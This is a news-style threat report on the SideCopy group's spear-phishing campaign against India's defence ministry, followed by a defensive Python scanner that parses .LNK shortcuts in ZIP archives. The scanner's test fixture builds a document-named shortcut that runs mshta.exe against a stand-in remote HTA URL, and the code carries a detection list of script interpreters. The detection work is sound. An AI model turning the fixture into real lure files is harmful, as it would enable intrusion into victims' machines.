An advanced persistent threat (APT) group known as SideCopy has been identified as the perpetrator of a new phishing campaign designed to target India's Ministry of Defence. SideCopy is a Pakistan-based group with a history of targeting India and Afghanistan.
The campaign uses spear-phishing emails that contain a ZIP archive file with a Windows shortcut file (.LNK) disguised as information about the K-4 ballistic missile developed by DRDO. The group also deploys the Action RAT backdoor and a new information-stealing malware called AuTo Stealer, which can gather and exfiltrate various types of files.
SideCopy is known for emulating the infection chains associated with SideWinder to deliver its own malware.
The group has been active since at least 2019 and has been linked to Transparent Tribe, another threat group of Pakistani origin.
Attack chains are initiated using spear-phishing emails to gain initial access. Once the .LNK file is executed, an HTML application is retrieved from a remote server that displays a decoy presentation while stealthily deploying the Action RAT backdoor.
In addition to gathering information about the victim machine, the malware is capable of running commands sent from a command-and-control (C2) server, harvesting files, and dropping follow-on malware. The group continuously evolves its techniques and incorporates new tools into its arsenal, according to Cyble, the company that attributed the operation to SideCopy.
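The infection chain described above (a ZIP archive carrying a .LNK shortcut that launches a remote HTML application) can be checked for at the mail gateway or in a sandbox without executing anything: the shortcut file format is documented, so its command line can be parsed statically. The following is an added example written for this article, not code from Cyble or from the reporting it summarises. It implements a small parser for the Shell Link (.LNK) header and StringData fields, scans an in-memory ZIP for shortcut entries, and flags the indicators the article mentions: a double extension masquerading as a document, a launch of mshta.exe, and a remote URL in the arguments. The archive, the file name, and the URL `http://decoy.example/k4.hta` are constructed for the demonstration and are not indicators from the campaign.

```python
import io
import struct
import zipfile

# Shell Link header constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

FLAG_HAS_ID_LIST = 0x01
FLAG_HAS_LINK_INFO = 0x02
FLAG_HAS_NAME = 0x04
FLAG_HAS_RELATIVE_PATH = 0x08
FLAG_HAS_WORKING_DIR = 0x10
FLAG_HAS_ARGUMENTS = 0x20
FLAG_HAS_ICON_LOCATION = 0x40
FLAG_IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag bit is set.
STRING_FIELDS = (
    (FLAG_HAS_NAME, "name"),
    (FLAG_HAS_RELATIVE_PATH, "relative_path"),
    (FLAG_HAS_WORKING_DIR, "working_dir"),
    (FLAG_HAS_ARGUMENTS, "arguments"),
    (FLAG_HAS_ICON_LOCATION, "icon_location"),
)

# Interpreters an LNK lure typically relies on; the article's chain uses an HTA.
LOLBIN_TOKENS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32")


def _read_string(data, off, unicode):
    # StringData: 2-byte character count, then the characters (no terminator).
    count = struct.unpack_from("<H", data, off)[0]
    off += 2
    if unicode:
        raw = data[off:off + count * 2]
        return raw.decode("utf-16-le"), off + count * 2
    raw = data[off:off + count]
    return raw.decode("latin-1"), off + count


def parse_lnk(data):
    """Return the StringData fields of a .LNK file as a dict (empty string if absent)."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = LNK_HEADER_SIZE
    if flags & FLAG_HAS_ID_LIST:          # skip LinkTargetIDList (2-byte size prefix)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & FLAG_HAS_LINK_INFO:        # skip LinkInfo (4-byte size includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & FLAG_IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            fields[name], off = _read_string(data, off, unicode)
        else:
            fields[name] = ""
    return fields


def assess_lnk(entry_name, fields):
    """Return a list of reasons this shortcut looks like a lure (empty if none)."""
    reasons = []
    if entry_name.lower().count(".") >= 2:
        reasons.append("double extension")
    cmdline = (fields["relative_path"] + " " + fields["arguments"]).lower()
    for token in LOLBIN_TOKENS:
        if token in cmdline:
            reasons.append("launches " + token)
    if "http://" in cmdline or "https://" in cmdline:
        reasons.append("remote URL in command line")
    return reasons


def scan_zip(zip_bytes):
    """Scan every .lnk entry of a ZIP (given as bytes); return [(name, reasons), ...]."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError as exc:
                findings.append((info.filename, ["unparseable .lnk: %s" % exc]))
                continue
            reasons = assess_lnk(info.filename, fields)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_lnk(relative_path, arguments):
    """Construct a minimal Unicode .LNK with only RelativePath and Arguments set (test fixture)."""
    flags = FLAG_HAS_RELATIVE_PATH | FLAG_HAS_ARGUMENTS | FLAG_IS_UNICODE
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + bytes(LNK_HEADER_SIZE - 24))   # remaining header fields zeroed
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def demo():
    """Constructed sample: a ZIP with a document-looking .lnk that runs a remote HTA."""
    lnk = build_lnk("..\\..\\Windows\\System32\\mshta.exe", "http://decoy.example/k4.hta")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("K-4_Missile_Info.pdf.lnk", lnk)
    return scan_zip(buf.getvalue())


if __name__ == "__main__":
    for name, reasons in demo():
        print(name, "->", "; ".join(reasons))
```

The parser skips the LinkTargetIDList and LinkInfo blocks that real shortcuts usually carry, so it works on files saved by Explorer as well as on the minimal fixture built here; any entry that fails to parse is reported rather than silently ignored, since a malformed .LNK inside an archive is itself worth a look.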
This is not the first time that SideCopy has employed Action RAT in its attacks directed against India.
In December 2021, a set of intrusions that breached several ministries in Afghanistan and a shared government computer in India to steal sensitive credentials were disclosed. The latest findings come a month after the adversarial crew was spotted targeting the Indian Army in a separate campaign.